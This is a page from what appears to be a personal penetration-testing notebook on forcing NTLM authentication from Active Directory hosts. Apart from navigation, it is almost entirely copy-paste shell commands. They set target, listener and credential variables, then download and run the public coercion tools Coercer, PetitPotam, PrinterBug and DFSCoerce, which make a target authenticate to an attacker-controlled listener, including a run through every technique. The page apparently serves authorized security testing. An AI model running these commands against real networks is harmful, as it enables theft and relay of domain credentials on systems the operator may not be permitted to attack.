6️
SixthCyber
  • Introduction
  • Favorite Pages
  • 🌐Active Directory
    • Timeroasting
    • AD Testing Checklist (Windows)
    • Create Machine Account
    • Searching SMB Shares
    • Active Directory Password Spraying
    • AD Testing Checklist (Linux)
    • Tunneling Windows VM to Target Environment (WireGuard)
    • 🕐Analyzing Data with Bloodhound
    • 🕐Kerberoasting
    • Configuring Windows 11 for AD Testing
  • 🕐As-Rep Roasting
  • ADCS Exploitation
  • NTLM Coercion
  • Building Custom Wordlists
Powered by GitBook
On this page
  • Define Shell Variables
  • Coercer (Perfered)
  • PetitPotam
  • PrinterBug
  • DFSCoerce

NTLM Coercion

Coerce NTLM authentication from hosts using any Active Directory account

Define Shell Variables

TARGET='<TARGET IP/FQDN>'
LISTENER='<YOUR IP/FQDN>'
ADUSER='<AD USERNAME>'
ADDOMAIN='<AD DOMAIN>'

Coercer (Perfered)

pipx install git+https://github.com/p0dalirius/Coercer.git
source ~/.zshrc

# Scan for Coercion
coercer scan -t $TARGET -u $ADUSER -d $ADDOMAIN

# Coerce Bruit Force (All Techniques)
coercer coerce -l $LISTENER -t $TARGET -u $ADUSER -d $ADDOMAIN --always-continue

# Coerce HTTL NTLM Auth (WebDAV)
coercer coerce -l $LISTENER -t $TARGET -u $ADUSER -d $ADDOMAIN --auth-type http

PetitPotam

cd tools
git clone https://github.com/topotam/PetitPotam.git
cd PetitPotam
chmod +x PetitPotam.py
python3 PetitPotam.py $LISTENER $TARGET -u $ADUSER -d $ADDOMAIN

PrinterBug

cd tools
git clone https://github.com/dirkjanm/krbrelayx
cd krbrelayx
python3 printerbug.py $ADDOMAIN/$ADUSER@$TARGET $LISTENER

DFSCoerce

cd tools
git clone https://github.com/Wh04m1001/DFSCoerce.git
cd DFSCoerce
python3 dfscoerce.py $LISTENER $TARGET -u $ADUSER -d $ADDOMAIN
PreviousADCS ExploitationNextBuilding Custom Wordlists

Last updated 1 year ago